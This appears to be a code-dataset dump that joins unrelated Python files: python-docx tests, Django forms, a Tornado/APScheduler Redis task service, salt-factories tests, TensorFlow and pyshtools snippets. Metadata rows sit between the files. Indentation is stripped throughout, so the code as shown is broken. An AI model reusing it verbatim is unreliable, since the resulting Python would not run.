a = parser.add_argument
a('--window', type=str, default='hann',
help='Window function to use. Supported: \n' + '|'.join(known_window_types))
a('--length', type=int, default=1024,
help='Number of coefficients in window')
a('--symmetric', default=False, action='store_true',
help='Whether to use a symmetric window. Defaults to False, normal for FFT')
a('--name', type=str, default='',
help='Name of the generate C array')
a('--out', type=str, default='',
help='Output file. Default: $name.h')
a('--linewrap', type=int, default=70,
help='Maximum width of lines')
parsed = parser.parse_args(args)
return parsed
def window_function(name, window_type, length, fft_mode, linewrap):
import scipy.signal
window = scipy.signal.get_window(window_type, length, fftbins=fft_mode)
gen = cgen.array_declare(name, length, values=window)
w = textwrap.wrap(gen, linewrap)
wrapped = '\n'.join(w)
return wrapped
def main():
args = parse()
window_type = args.window
length = args.length
fft_mode = not args.symmetric
name = args.name
out = args.out
if not name:
name = '_'.join([window_type, str(length), 'lut'])
if not out:
out = name+'.h'
if window_type not in known_window_types:
print('Warning: Unknown window type {}. Known:\n {}'.format(window_type, known_window_types))
preamble = '// This file was generated with emlearn using eml-window-function\n\n'
wrapped = window_function(name, window_type, length, fft_mode, args.linewrap)
wrapped = preamble + wrapped
with open(out, 'w') as f:
f.write(wrapped)
print('Wrote to', out)
if __name__ == '__main__':
main()
| [
"[email protected]"
]
| |
4037b86353a2311197e3c0421e50369f7d041340 | 49ba5356bdc5df7dd9803b56fe507c5164a90716 | /utils.py | aab51dd8b4c7a0d60394907fa69bc482cd0d2d7e | []
| no_license | uxlsl/leetcode_practice | d80ad481c9d8ee71cce0f3c66e98446ced149635 | d8ed762d1005975f0de4f07760c9671195621c88 | refs/heads/master | 2021-04-25T18:12:28.136504 | 2020-03-11T07:54:15 | 2020-03-11T07:54:15 | 121,472,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py |
class TreeNode(object):
def __init__(self, x, left=None, right=None):
self.val = x
self.left = left
self.right = right
| [
"[email protected]"
]
| |
4cfee0890ffbe11a38b40e78c56a22069bd0b55e | 17153c0a7edfa2b69aedbf146873d38c6a92018d | /tests/test_api.py | 5f22a258b6e7cca8969209c26b4227937461551b | [
"MIT"
]
| permissive | netsyno/python-docx | 3d7c9ad23b32fea8b6676b6da1d941a18936bc07 | f181a89f1c1651baba6a37399e6bba09769459ae | refs/heads/master | 2021-01-17T21:43:50.723334 | 2016-11-09T09:08:08 | 2016-11-09T09:08:08 | 18,512,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,069 | py | # encoding: utf-8
"""
Test suite for the docx.api module
"""
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
import pytest
from docx.api import Document
from docx.enum.text import WD_BREAK
from docx.opc.constants import CONTENT_TYPE as CT, RELATIONSHIP_TYPE as RT
from docx.package import Package
from docx.parts.document import DocumentPart, InlineShapes
from docx.parts.numbering import NumberingPart
from docx.parts.styles import StylesPart
from docx.table import Table
from docx.text import Paragraph, Run
from .unitutil import (
instance_mock, class_mock, method_mock, property_mock, var_mock
)
class DescribeDocument(object):
def it_opens_a_docx_on_construction(self, init_fixture):
docx_, open_ = init_fixture
document = Document(docx_)
open_.assert_called_once_with(docx_)
assert isinstance(document, Document)
def it_can_open_a_docx_file(self, open_fixture):
docx_, Package_, package_, document_part_ = open_fixture
document_part, package = Document._open(docx_)
Package_.open.assert_called_once_with(docx_)
assert document_part is document_part
assert package is package_
def it_opens_default_template_if_no_file_provided(
self, Package_, default_docx_):
Document._open(None)
Package_.open.assert_called_once_with(default_docx_)
def it_should_raise_if_not_a_Word_file(self, Package_, package_, docx_):
package_.main_document.content_type = 'foobar'
with pytest.raises(ValueError):
Document._open(docx_)
def it_can_add_a_heading(self, add_heading_fixture):
document, add_paragraph_, p_, text, level, style = add_heading_fixture
p = document.add_heading(text, level)
add_paragraph_.assert_called_once_with(text, style)
assert p is p_
def it_should_raise_on_heading_level_out_of_range(self, document):
with pytest.raises(ValueError):
document.add_heading(level=-1)
with pytest.raises(ValueError):
document.add_heading(level=10)
def it_can_add_an_empty_paragraph(self, add_empty_paragraph_fixture):
document, document_part_, p_ = add_empty_paragraph_fixture
p = document.add_paragraph()
document_part_.add_paragraph.assert_called_once_with()
assert p is p_
def it_can_add_a_paragraph_of_text(self, add_text_paragraph_fixture):
document, text, p_, r_ = add_text_paragraph_fixture
p = document.add_paragraph(text)
p.add_run.assert_called_once_with()
r_.add_text.assert_called_once_with(text)
def it_can_add_a_styled_paragraph(self, add_styled_paragraph_fixture):
document, style, p_ = add_styled_paragraph_fixture
p = document.add_paragraph(style=style)
assert p.style == style
def it_can_add_a_page_break(self, add_page_break_fixture):
document, document_part_, p_, r_ = add_page_break_fixture
p = document.add_page_break()
document_part_.add_paragraph.assert_called_once_with()
p_.add_run.assert_called_once_with()
r_.add_break.assert_called_once_with(WD_BREAK.PAGE)
assert p is p_
def it_can_add_a_picture(self, add_picture_fixture):
(document, image_path, width, height, inline_shapes_, expected_width,
expected_height, picture_) = add_picture_fixture
picture = document.add_picture(image_path, width, height)
inline_shapes_.add_picture.assert_called_once_with(image_path)
assert picture.width == expected_width
assert picture.height == expected_height
assert picture is picture_
def it_can_add_a_table(self, add_table_fixture):
document, rows, cols, style, document_part_, expected_style, table_ = (
add_table_fixture
)
table = document.add_table(rows, cols, style)
document_part_.add_table.assert_called_once_with(rows, cols)
assert table.style == expected_style
assert table == table_
def it_provides_access_to_the_document_inline_shapes(self, document):
body = document.inline_shapes
assert body is document._document_part.inline_shapes
def it_provides_access_to_the_document_paragraphs(
self, paragraphs_fixture):
document, paragraphs_ = paragraphs_fixture
paragraphs = document.paragraphs
assert paragraphs is paragraphs_
def it_provides_access_to_the_document_tables(self, tables_fixture):
document, tables_ = tables_fixture
tables = document.tables
assert tables is tables_
def it_can_save_the_package(self, save_fixture):
document, package_, file_ = save_fixture
document.save(file_)
package_.save.assert_called_once_with(file_)
def it_provides_access_to_the_numbering_part(self, num_part_get_fixture):
document, document_part_, numbering_part_ = num_part_get_fixture
numbering_part = document.numbering_part
document_part_.part_related_by.assert_called_once_with(RT.NUMBERING)
assert numbering_part is numbering_part_
def it_creates_numbering_part_on_first_access_if_not_present(
self, num_part_create_fixture):
document, NumberingPart_, document_part_, numbering_part_ = (
num_part_create_fixture
)
numbering_part = document.numbering_part
NumberingPart_.new.assert_called_once_with()
document_part_.relate_to.assert_called_once_with(
numbering_part_, RT.NUMBERING
)
assert numbering_part is numbering_part_
def it_provides_access_to_the_styles_part(self, styles_part_get_fixture):
document, document_part_, styles_part_ = styles_part_get_fixture
styles_part = document.styles_part
document_part_.part_related_by.assert_called_once_with(RT.STYLES)
assert styles_part is styles_part_
def it_creates_styles_part_on_first_access_if_not_present(
self, styles_part_create_fixture):
document, StylesPart_, document_part_, styles_part_ = (
styles_part_create_fixture
)
styles_part = document.styles_part
StylesPart_.new.assert_called_once_with()
document_part_.relate_to.assert_called_once_with(
styles_part_, RT.STYLES
)
assert styles_part is styles_part_
# fixtures -------------------------------------------------------
@pytest.fixture(params=[0, 1, 2, 5, 9])
def add_heading_fixture(self, request, document, add_paragraph_, p_):
level = request.param
text = 'Spam vs. Bacon'
style = 'Title' if level == 0 else 'Heading%d' % level
return document, add_paragraph_, p_, text, level, style
@pytest.fixture
def add_empty_paragraph_fixture(self, document, document_part_, p_):
return document, document_part_, p_
@pytest.fixture
def add_page_break_fixture(self, document, document_part_, p_, r_):
return document, document_part_, p_, r_
@pytest.fixture
def add_paragraph_(self, request, p_):
return method_mock(
request, Document, 'add_paragraph', return_value=p_
)
@pytest.fixture(params=[
(None, None, 200, 100),
(1000, 500, 1000, 500),
(2000, None, 2000, 1000),
(None, 2000, 4000, 2000),
])
def add_picture_fixture(
self, request, Document_inline_shapes_, inline_shapes_):
width, height, expected_width, expected_height = request.param
document = Document()
image_path_ = instance_mock(request, str, name='image_path_')
picture_ = inline_shapes_.add_picture.return_value
picture_.width, picture_.height = 200, 100
return (
document, image_path_, width, height, inline_shapes_,
expected_width, expected_height, picture_
)
@pytest.fixture
def add_styled_paragraph_fixture(self, document, p_):
style = 'foobaresque'
return document, style, p_
@pytest.fixture(params=[None, 'LightShading-Accent1', 'foobar'])
def add_table_fixture(self, request, document, document_part_, table_):
rows, cols = 4, 2
style = expected_style = request.param
return (
document, rows, cols, style, document_part_, expected_style,
table_
)
@pytest.fixture
def add_text_paragraph_fixture(self, document, p_, r_):
text = 'foobar\rbarfoo'
return document, text, p_, r_
@pytest.fixture
def default_docx_(self, request):
return var_mock(request, 'docx.api._default_docx_path')
@pytest.fixture
def Document_inline_shapes_(self, request, inline_shapes_):
return property_mock(
request, Document, 'inline_shapes', return_value=inline_shapes_
)
@pytest.fixture
def document(self, open_):
return Document()
@pytest.fixture
def document_part_(self, request, p_, paragraphs_, table_, tables_):
document_part_ = instance_mock(
request, DocumentPart, content_type=CT.WML_DOCUMENT_MAIN
)
document_part_.add_paragraph.return_value = p_
document_part_.add_table.return_value = table_
document_part_.paragraphs = paragraphs_
document_part_.tables = tables_
return document_part_
@pytest.fixture
def docx_(self, request):
return instance_mock(request, str)
@pytest.fixture
def init_fixture(self, docx_, open_):
return docx_, open_
@pytest.fixture
def inline_shapes_(self, request):
return instance_mock(request, InlineShapes)
@pytest.fixture
def num_part_create_fixture(
self, document, NumberingPart_, document_part_, numbering_part_):
document_part_.part_related_by.side_effect = KeyError
return document, NumberingPart_, document_part_, numbering_part_
@pytest.fixture
def num_part_get_fixture(self, document, document_part_, numbering_part_):
document_part_.part_related_by.return_value = numbering_part_
return document, document_part_, numbering_part_
@pytest.fixture
def NumberingPart_(self, request, numbering_part_):
NumberingPart_ = class_mock(request, 'docx.api.NumberingPart')
NumberingPart_.new.return_value = numbering_part_
return NumberingPart_
@pytest.fixture
def numbering_part_(self, request):
return instance_mock(request, NumberingPart)
@pytest.fixture
def open_(self, request, document_part_, package_):
return method_mock(
request, Document, '_open',
return_value=(document_part_, package_)
)
@pytest.fixture
def open_fixture(self, docx_, Package_, package_, document_part_):
return docx_, Package_, package_, document_part_
@pytest.fixture
def p_(self, request, r_):
p_ = instance_mock(request, Paragraph)
p_.add_run.return_value = r_
return p_
@pytest.fixture
def Package_(self, request, package_):
Package_ = class_mock(request, 'docx.api.Package')
Package_.open.return_value = package_
return Package_
@pytest.fixture
def package_(self, request, document_part_):
package_ = instance_mock(request, Package)
package_.main_document = document_part_
return package_
@pytest.fixture
def paragraphs_(self, request):
return instance_mock(request, list)
@pytest.fixture
def paragraphs_fixture(self, document, paragraphs_):
return document, paragraphs_
@pytest.fixture
def r_(self, request):
return instance_mock(request, Run)
@pytest.fixture
def save_fixture(self, request, open_, package_):
file_ = instance_mock(request, str)
document = Document()
return document, package_, file_
@pytest.fixture
def StylesPart_(self, request, styles_part_):
StylesPart_ = class_mock(request, 'docx.api.StylesPart')
StylesPart_.new.return_value = styles_part_
return StylesPart_
@pytest.fixture
def styles_part_(self, request):
return instance_mock(request, StylesPart)
@pytest.fixture
def styles_part_create_fixture(
self, document, StylesPart_, document_part_, styles_part_):
document_part_.part_related_by.side_effect = KeyError
return document, StylesPart_, document_part_, styles_part_
@pytest.fixture
def styles_part_get_fixture(self, document, document_part_, styles_part_):
document_part_.part_related_by.return_value = styles_part_
return document, document_part_, styles_part_
@pytest.fixture
def table_(self, request):
return instance_mock(request, Table, style=None)
@pytest.fixture
def tables_(self, request):
return instance_mock(request, list)
@pytest.fixture
def tables_fixture(self, document, tables_):
return document, tables_
| [
"[email protected]"
]
| |
7a5a5eb855c8c133eaf70cae42962096075431d4 | 2fab03dd2bc2b214a1f608e3ddb1990b052fcfd0 | /first_forms/apps/forms/forms.py | 07fa07485b8a1ed4396b54d89357f6cc1dbf3671 | []
| no_license | tlee0058/Django_FORMS | 7f7bdbbdc090f59231c8dd1e4624ff16b7a88890 | 2260b86c3d06fd2a10f867481f9e4a068997fd6a | refs/heads/master | 2020-03-09T07:59:31.055697 | 2018-04-08T21:27:35 | 2018-04-08T21:27:35 | 128,678,384 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | from django import forms
from .models import User
class RegistrationForm(forms.Form):
first_name = forms.CharField(max_length=45)
last_name = forms.CharField(max_length=45)
email = forms.EmailField()
password = forms.CharField(max_length=100, widget=forms.PasswordInput)
confirm_password = forms.CharField(max_length=100, widget=forms.PasswordInput)
class RegisterForm(forms.ModelForm):
class Meta:
model = User
fields = '__all__' | [
"[email protected]"
]
| |
7b1f9660c366b7545b5e9bf7fe81748e3e2d5df8 | 4760a482ed52eb7f786e6987e55704fcfb33dd18 | /app.py | 15435449c61f34cd0ec135223aadbf9d16a11212 | []
| no_license | zhidu-qidian/scheduler | 18566993df81fb3b211d783aacef0c5b4268d8d6 | 08be2a10eb769ccb2da6d3de17bd19b4c029cd87 | refs/heads/master | 2021-05-15T18:41:15.254984 | 2017-10-20T08:19:31 | 2017-10-20T08:19:31 | 107,651,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,101 | py | # coding: utf-8
from datetime import datetime
import logging
import sys
from urllib import quote
from apscheduler.schedulers.tornado import TornadoScheduler
from apscheduler.jobstores.base import JobLookupError
from pymongo import MongoClient
from redis import from_url
from tornado import httpserver
from tornado import ioloop
from tornado import web
from tornado.web import RequestHandler
redis_url = "redis://内网地址:6379"
# redis_url = "redis://127.0.0.1:6379"
redis = from_url(redis_url, db=2, max_connections=10)
MONGODB_HOST_PORT = "内网地址:27017"
MONGODB_PASSWORD = ""
COL_RULES = "timerules"
def get_mongodb_database(database, user="third"):
url = "mongodb://{0}:{1}@{2}/{3}".format(
user, quote(MONGODB_PASSWORD), MONGODB_HOST_PORT, database
)
client = MongoClient(host=url, maxPoolSize=5, minPoolSize=1)
return client.get_default_database()
def task(struct, key, value):
if struct == "set":
redis.sadd(key, value)
elif struct == "list":
redis.rpush(key, value)
def format_trigger(string):
string = string.strip()
if string[0] == "T": # interval
args = dict()
start = 1
for i, c in enumerate(string):
if c == "D":
args["days"] = int(string[start:i])
start = i+1
elif c == "H":
args["hours"] = int(string[start:i])
start = i + 1
elif c == "M":
args["minutes"] = int(string[start:i])
start = i + 1
elif c == "S":
args["seconds"] = int(string[start:i])
start = i + 1
else:
pass
return "interval", args
elif ";" in string: # cron
fields = string.strip().split(";")
args = {
"month": fields[0],
"day": fields[1],
"hour": fields[2],
"minute": fields[3],
"second": fields[4],
}
return "cron", args
else: # date
return "date", {"run_date": datetime.strptime(string, "%Y-%m-%d %H:%M:%S")}
class TaskHandler(RequestHandler):
def get(self, *args, **kwargs):
ids = self.get_arguments("id")
results = {"jobs": list()}
if ids:
for _id in ids:
job = self.application.sdr.get_job(job_id=_id)
if job:
next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
else:
for job in self.application.sdr.get_jobs():
next_time = job.next_run_time.strftime("%Y-%m-%d %H:%M:%S")
results["jobs"].append({"id": job.id, "name": job.name, "next": next_time})
self.write(results)
def post(self, *args, **kwargs):
_id = self.get_argument("id")
rule = self.get_argument("rule")
key = self.get_argument("key")
value = self.get_argument("value")
struct = self.get_argument("struct")
if not (_id or rule or key or value or struct):
self.write({"code": 400, "message": "invalid params"})
else:
trigger, params = format_trigger(rule)
self.application.sdr.add_job(
task,
trigger=trigger,
args=[struct, key, value],
id=_id,
replace_existing=True,
**params
)
data = {"_id": _id, "rule": rule, "key": key, "value": value,
"struct": struct}
if trigger != "date":
self.store(data)
self.write({"code": 200, "message": "add job %s success" % _id})
def delete(self, *args, **kwargs):
_id = self.get_argument("id")
try:
self.application.sdr.remove_job(job_id=_id)
self.remove(_id)
self.write({"code": 200, "message": "remove job %s success" % _id})
except JobLookupError:
self.write({"code": 404, "message": "no such job:%s" % _id})
def store(self, data):
col = self.application.db[COL_RULES]
query = {"_id": data["_id"]}
if col.count(query):
col.delete_one(query)
data["time"] = datetime.now()
col.insert_one(data)
def remove(self, _id):
col = self.application.db[COL_RULES]
query = {"_id": _id}
col.delete_one(query)
class Application(web.Application):
def __init__(self):
handlers = [
("/tasks", TaskHandler),
]
defaults = {
"coalesce": True,
"max_instances": 5,
"misfire_grace_time": 120,
"replace_existing": True
}
scheduler = TornadoScheduler(job_defaults=defaults)
scheduler.start()
self.sdr = scheduler
self.db = get_mongodb_database("thirdparty", "third")
init_schedule_task(scheduler, self.db)
web.Application.__init__(self, handlers=handlers)
def init_schedule_task(scheduler, db):
col = db[COL_RULES]
rules = col.find({})
for rule in rules:
trigger, params = format_trigger(rule["rule"])
scheduler.add_job(
task,
trigger=trigger,
args=[rule["struct"], rule["key"], rule["value"]],
id=rule["_id"],
replace_existing=True,
**params
)
logging.info("add %s job rule %s" % (rule["_id"], rule["rule"]))
def main():
http_server = httpserver.HTTPServer(Application())
address = sys.argv[1]
address = address.split(":")
host = address[0]
port = address[1]
http_server.listen(port=port, address=host)
ioloop.IOLoop.instance().start()
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO,
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
filename="log-app.log",
filemode="a+")
main()
| [
"[email protected]"
]
| |
ff315fba136d0af80f9ab92d97c8f7dcd05df541 | 35d16f57feae5fbb29237992590981b324bfe10b | /tests/functional/factories/daemons/test_master_factory.py | c3d1ab277613668aad13b73a7dbf685f1ef2f4b9 | [
"Apache-2.0"
]
| permissive | modamod/pytest-salt-factories | 592c477564534c196744f8445c5b62d97190af8e | 4bc885d60ec3f58d0c84283276ba1c99e6c30ba1 | refs/heads/master | 2023-02-13T15:32:34.123167 | 2021-01-19T06:15:33 | 2021-01-19T06:15:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,060 | py | import pytest
from saltfactories.utils import random_string
from saltfactories.utils import running_username
def test_keyword_basic_config_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"zzzz": True}
).config
assert "zzzz" in master_config
def test_interface_config_defaults(salt_factories):
interface = "172.17.0.1"
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"interface": interface}
).config
assert master_config["interface"] != interface
assert master_config["interface"] == "127.0.0.1"
def test_keyword_basic_config_overrides(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_overrides={"zzzz": True}
).config
assert "zzzz" in master_config
def test_interface_config_overrides(salt_factories):
interface = "172.17.0.1"
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_overrides={"interface": interface}
).config
assert master_config["interface"] != "127.0.0.1"
assert master_config["interface"] == interface
def test_keyword_simple_overrides_override_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults={"zzzz": False}, config_overrides={"zzzz": True}
).config
assert "zzzz" in master_config
assert master_config["zzzz"] is True
def test_keyword_nested_overrides_override_defaults(salt_factories):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"),
config_defaults={
"zzzz": False,
"user": "foobar",
"colors": {"black": True, "white": False},
},
config_overrides={"colors": {"white": True, "grey": False}},
).config
assert "zzzz" in master_config
assert master_config["zzzz"] is False
assert master_config["colors"] == {"black": True, "white": True, "grey": False}
def test_provide_root_dir(testdir, salt_factories):
root_dir = testdir.mkdir("custom-root")
config_defaults = {"root_dir": root_dir}
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), config_defaults=config_defaults
).config
assert master_config["root_dir"] == root_dir
def configure_kwargs_ids(value):
return "configure_kwargs={!r}".format(value)
@pytest.mark.parametrize(
"configure_kwargs",
[{"config_defaults": {"user": "blah"}}, {"config_overrides": {"user": "blah"}}, {}],
ids=configure_kwargs_ids,
)
def test_provide_user(salt_factories, configure_kwargs):
master_config = salt_factories.get_salt_master_daemon(
random_string("master-"), **configure_kwargs
).config
if not configure_kwargs:
# salt-factories injects the current username
assert master_config["user"] is not None
assert master_config["user"] == running_username()
else:
# salt-factories does not override the passed user value
assert master_config["user"] != running_username()
assert master_config["user"] == "blah"
@pytest.mark.parametrize(
"configure_kwargs",
[
{"config_defaults": None},
{"config_overrides": None},
{},
{"config_defaults": None, "config_overrides": {"user": "blah"}},
{"config_defaults": {"user": "blah"}, "config_overrides": None},
{"config_defaults": {"user": "blah"}, "config_overrides": {"user": "blah"}},
],
ids=configure_kwargs_ids,
)
def test_pytest_config(salt_factories, configure_kwargs):
master_id = random_string("master-")
config = salt_factories.get_salt_master_daemon(master_id, **configure_kwargs).config
config_key = "pytest-master"
assert config_key in config
assert "log" in config[config_key]
for key in ("host", "level", "port", "prefix"):
assert key in config[config_key]["log"]
| [
"[email protected]"
]
| |
0dbd426f8b5f12dbc8f3d582a2e24f5700f8f1b1 | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005965.py | 190e8d7a975427451853e01e989a121bf4b152c5 | []
| no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,302 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher141996(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.3.3.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.3.3.1.0_1', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher141996._instance is None:
CommutativeMatcher141996._instance = CommutativeMatcher141996()
return CommutativeMatcher141996._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 141995
return
yield
from collections import deque | [
"[email protected]"
]
| |
f05aad2d52815971fbc0b159d3996d831cefae17 | 2e3fd7f4d78847fbd713f521587fe39116fa34a0 | /glue/managers/simple.py | b7bf5644c754f60f1c85d25068b9074bab0f536c | [
"BSD-2-Clause"
]
| permissive | jkenlooper/glue | 24e3da4a94ec34632391f8ce93826cce3c347a57 | 8d2788fce4e23c314b2428831d34f89cdbeb2a9c | refs/heads/master | 2021-09-09T10:52:56.701113 | 2021-04-10T12:37:53 | 2021-04-10T12:37:53 | 181,468,692 | 0 | 0 | NOASSERTION | 2019-04-15T10:58:51 | 2019-04-15T10:58:51 | null | UTF-8 | Python | false | false | 330 | py | from .base import BaseManager
class SimpleManager(BaseManager):
"""Process a single folder and create one sprite. It works the
same way as :class:`~ProjectSpriteManager`, but only for one folder.
This is the default manager.
"""
def find_sprites(self):
self.add_sprite(path=self.config['source'])
| [
"[email protected]"
]
| |
c976055f913211d6c572da188dd343620dd1777c | 62e58c051128baef9452e7e0eb0b5a83367add26 | /edifact/D11A/COLREQD11AUN.py | 43c7ae15b28a1c63211d543e79f5399cf0ce7c28 | []
| no_license | dougvanhorn/bots-grammars | 2eb6c0a6b5231c14a6faf194b932aa614809076c | 09db18d9d9bd9d92cefbf00f1c0de1c590fe3d0d | refs/heads/master | 2021-05-16T12:55:58.022904 | 2019-05-17T15:22:23 | 2019-05-17T15:22:23 | 105,274,633 | 0 | 0 | null | 2017-09-29T13:21:21 | 2017-09-29T13:21:21 | null | UTF-8 | Python | false | false | 1,421 | py | #Generated by bots open source edi translator from UN-docs.
from bots.botsconfig import *
from edifact import syntax
from recordsD11AUN import recorddefs
structure = [
{ID: 'UNH', MIN: 1, MAX: 1, LEVEL: [
{ID: 'BGM', MIN: 1, MAX: 1},
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'FCA', MIN: 1, MAX: 1},
{ID: 'DOC', MIN: 1, MAX: 40},
{ID: 'INP', MIN: 0, MAX: 20},
{ID: 'FTX', MIN: 0, MAX: 15},
{ID: 'FII', MIN: 1, MAX: 7, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 1},
{ID: 'CTA', MIN: 0, MAX: 1},
{ID: 'COM', MIN: 0, MAX: 5},
]},
{ID: 'NAD', MIN: 1, MAX: 9, LEVEL: [
{ID: 'RFF', MIN: 0, MAX: 3},
{ID: 'CTA', MIN: 0, MAX: 1},
{ID: 'COM', MIN: 0, MAX: 5},
]},
{ID: 'PYT', MIN: 1, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'FTX', MIN: 0, MAX: 1},
]},
{ID: 'MOA', MIN: 1, MAX: 5, LEVEL: [
{ID: 'FTX', MIN: 0, MAX: 1},
]},
{ID: 'TDT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
{ID: 'LOC', MIN: 0, MAX: 3},
]},
{ID: 'GEI', MIN: 0, MAX: 10, LEVEL: [
{ID: 'MOA', MIN: 0, MAX: 1},
{ID: 'LOC', MIN: 0, MAX: 2},
{ID: 'NAD', MIN: 0, MAX: 1},
{ID: 'RCS', MIN: 0, MAX: 1},
{ID: 'FTX', MIN: 0, MAX: 10},
]},
{ID: 'AUT', MIN: 0, MAX: 1, LEVEL: [
{ID: 'DTM', MIN: 0, MAX: 1},
]},
{ID: 'UNT', MIN: 1, MAX: 1},
]},
]
| [
"[email protected]"
]
| |
732aa5dde56b43bc0f071270e29ec985954b334e | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03346/s258893438.py | 945e31f4eeb13ab37b2dc35c29cda1e50389a8ca | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import sys
input = sys.stdin.readline
import heapq
def read():
N = int(input().strip())
P = []
for i in range(N):
p = int(input().strip())
P.append(p)
return N, P
def solve(N, P):
Q = [0 for i in range(N)]
for i in range(N):
Q[P[i]-1] = i
max_count = 0
count = 0
prev = -1
for i in range(N):
q = Q[i]
if prev < q:
count += 1
prev = q
else:
max_count = max(max_count, count)
count = 1
prev = q
max_count = max(max_count, count)
return N - max_count
if __name__ == '__main__':
inputs = read()
print("%s" % solve(*inputs))
| [
"[email protected]"
]
| |
18f082ffc446b47fa664e4b53b891ae87ac64a7e | b0b87924d07101e25fa56754ceaa2f22edc10208 | /workspace/DL/DL3-2.py | ae888fd2295b854fffc3b000ca76341442b1ef96 | []
| no_license | SoheeKwak/Python | 2295dd03e5f235315d07355cbe72998f8b86c147 | e1a5f0ecf31e926f2320c5df0e3416306b8ce316 | refs/heads/master | 2020-04-02T13:49:58.367361 | 2018-11-23T09:33:23 | 2018-11-23T09:33:23 | 154,499,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | import tensorflow as tf
# w와 b에 대한 초기값을 부여한 상태에서 모델링
w=tf.Variable([.3], tf.float32)
b=tf.Variable([-.3], tf.float32)
x=tf.placeholder(tf.float32)
y=tf.placeholder(tf.float32)
lm=x*w+b
loss=tf.reduce_sum(tf.square(lm-y))
train=tf.train.GradientDescentOptimizer(0.01).minimize(loss)
x_train=[1,2,3,4]
y_train=[0,-1,-2,-3]
#트레이닝 횟수 1000번->모델생성
#생성된 모델의 w, b, loss출력
sess=tf.Session()
sess.run(tf.global_variables_initializer())
for i in range(1000):
sess.run(train,feed_dict={x:x_train,y:y_train})
wv, bv, lossv = sess.run([w,b,loss],feed_dict={x:x_train, y:y_train})
print("w값:%s b값:%s loss값:%s" % (wv, bv, lossv))
| [
"[email protected]"
]
| |
4a9a89a9bd4fe83f91578a20cf8ba51411b5e658 | b9b7bf5d82ffc7c972dda803241c3e6247a92002 | /pyshtools/spectralanalysis/spectrum.py | 048b9436736827a5214869cb2a7209fb92ee713e | [
"BSD-3-Clause"
]
| permissive | MMesch/SHTOOLS | 9aff298b8075f7d9fad9690ab2053e934197403d | 72bf04fb9b83f17c2dac2a8f252a8634d6f7588a | refs/heads/master | 2021-01-24T20:02:42.911226 | 2017-12-25T22:35:00 | 2017-12-25T22:35:00 | 26,169,620 | 1 | 0 | null | 2016-08-29T11:57:46 | 2014-11-04T13:22:14 | null | UTF-8 | Python | false | false | 4,810 | py | import numpy as _np
def spectrum(clm, normalization='4pi', degrees=None, lmax=None,
convention='power', unit='per_l', base=10.):
"""
Return the spectrum of the spherical harmonic coefficients as a function
of spherical harmonic degree.
Usage
-----
array = spectrum(clm, [normalization, degrees, lmax, convention,
unit, base])
Returns
-------
array : ndarray, shape (len(degrees))
1-D ndarray of the spectrum.
Parameters
----------
clm : ndarray, shape (2, lmax + 1, lmax + 1)
ndarray containing the spherical harmonic coefficients.
normalization : str, optional, default = '4pi'
'4pi', 'ortho' or 'schmidt' for geodesy 4pi normalized,
orthonormalized, or Schmidt semi-normalized coefficients, respectively.
lmax : int, optional, default = len(clm[0,:,0]) - 1.
Maximum spherical harmonic degree to output.
degrees : ndarray, optional, default = numpy.arange(lmax+1)
Array containing the spherical harmonic degrees where the spectrum
is computed.
convention : str, optional, default = 'power'
The type of spectrum to return: 'power' for power spectrum, 'energy'
for energy spectrum, and 'l2norm' for the l2 norm spectrum.
unit : str, optional, default = 'per_l'
If 'per_l', return the total contribution to the spectrum for each
spherical harmonic degree l. If 'per_lm', return the average
